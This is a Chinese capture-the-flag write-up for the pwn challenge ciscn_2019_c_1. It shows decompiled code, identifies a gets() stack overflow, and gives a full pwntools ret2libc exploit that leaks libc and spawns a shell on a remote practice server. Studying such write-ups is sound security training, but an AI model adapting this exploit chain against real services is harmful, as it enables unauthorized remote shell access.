ciscn_2019_c_1
使用checksec查看:
只开启了栈不可执行。
放进IDA中分析:
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [rsp+Ch] [rbp-4h]
init(*(_QWORD *)&argc, argv, envp);
puts("EEEEEEE hh iii ");
puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
puts("EE mmm mm mm aa aaa cc hh hh iii nn nn eeeee ");
puts("EEEEEEE mmm mm mm aaa aa ccccc hh hh iii nn nn eeeee ");
puts("====================================================================");
puts("Welcome to this Encryption machine\n");
begin();
while ( 1 )
{
while ( 1 )
{
fflush(0LL);
v4 = 0;
__isoc99_scanf("%d", &v4);
getchar();
if ( v4 != 2 )
break;
puts("I think you can do it by yourself");
begin();
}
if ( v4 == 3 )
{
puts("Bye!");
return 0;
}
if ( v4 != 1 )
break;
encrypt();
begin();
}
puts("Something Wrong!");
return 0;
}
begin()是文本,不用管。- 选项2和3没什么用,只有1是有用的。
- 跟进
encrypt()
encrypt():
int encrypt()
{
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h]
__int16 v3; // [rsp+30h] [rbp-20h]
memset(s, 0, sizeof(s));
v3 = 0;
puts("Input your Plaintext to be encrypted");
gets(s);
while ( 1 )
{
v0 = (unsigned int)x;
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;
}
else
{
s[x] ^= 0xEu;
}
}
else
{
s[x] ^= 0xDu;
}
++x;
}
puts("Ciphertext");
return puts(s);
}
gets(s);:存在栈溢出。- 中间一堆代码加密方式。
题目思路
- 没有Canary,可以通过栈溢出泄露lib
- 算出偏移量,算出system函数和“bin/sh”字符串地址
- 再次通过栈溢出getshell
步骤解析
用
\x00绕过strlen()函数的检测接着就能正常编写payload,泄露libc基地址,从而算出
system()地址和/bin/sh地址
![[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KVi2abQk-1646290560664)(ciscn_2019_c_1.assets/image-20220303144310100.png)]](https://img-blog.csdnimg.cn/d371d04e427a40e49f6755366b9e1a8e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAbTBzd2F5,size_20,color_FFFFFF,t_70,g_se,x_16)
之后再通过一次栈溢出即可getshell
完整exp
from pwn import *
# from LibcSearcher import *
#start
# r = process("../buu/ciscn_2019_c_1")
r = remote("node4.buuoj.cn",25053)
lib = ELF("../buu/ubuntu18(64).so")
elf = ELF("../buu/ciscn_2019_c_1")
#params
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi_addr = 0x400c83
main_addr = elf.symbols['main']
ret=0x4006b9
#attack
payload = b'\x00' + b'M'*(0x50+8-1) +p64(rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload)
r.recvline()
r.recvline()
puts_addr = u64(r.recv(6).ljust(8,b'\x00'))
# print("puts_addr:"+str(hex(puts_addr)))
# libc
base_addr = puts_addr - lib.symbols['puts']
system_addr = base_addr + lib.symbols['system']
bin_sh_addr = base_addr + next(lib.search(b'/bin/sh'))
# print("system_addr:"+str(hex(system_addr)))
# print("bin_sh_addr:"+str(hex(bin_sh_addr)))
# obj = LibcSearcher("puts", puts_addr)
# base_addr = puts_addr >> 24
# base_addr = base_addr << 24
# system_addr = base_addr+ obj.dump("system") #system 偏移
# bin_sh_addr = base_addr+ obj.dump("str_bin_sh") #/bin/sh 偏移
#attack2
payload2 = b'\x00' + b'M'*(0x50+8-1) + p64(ret) +p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.recv()
r.sendline('1')
r.recv()
r.sendline(payload2)
r.interactive()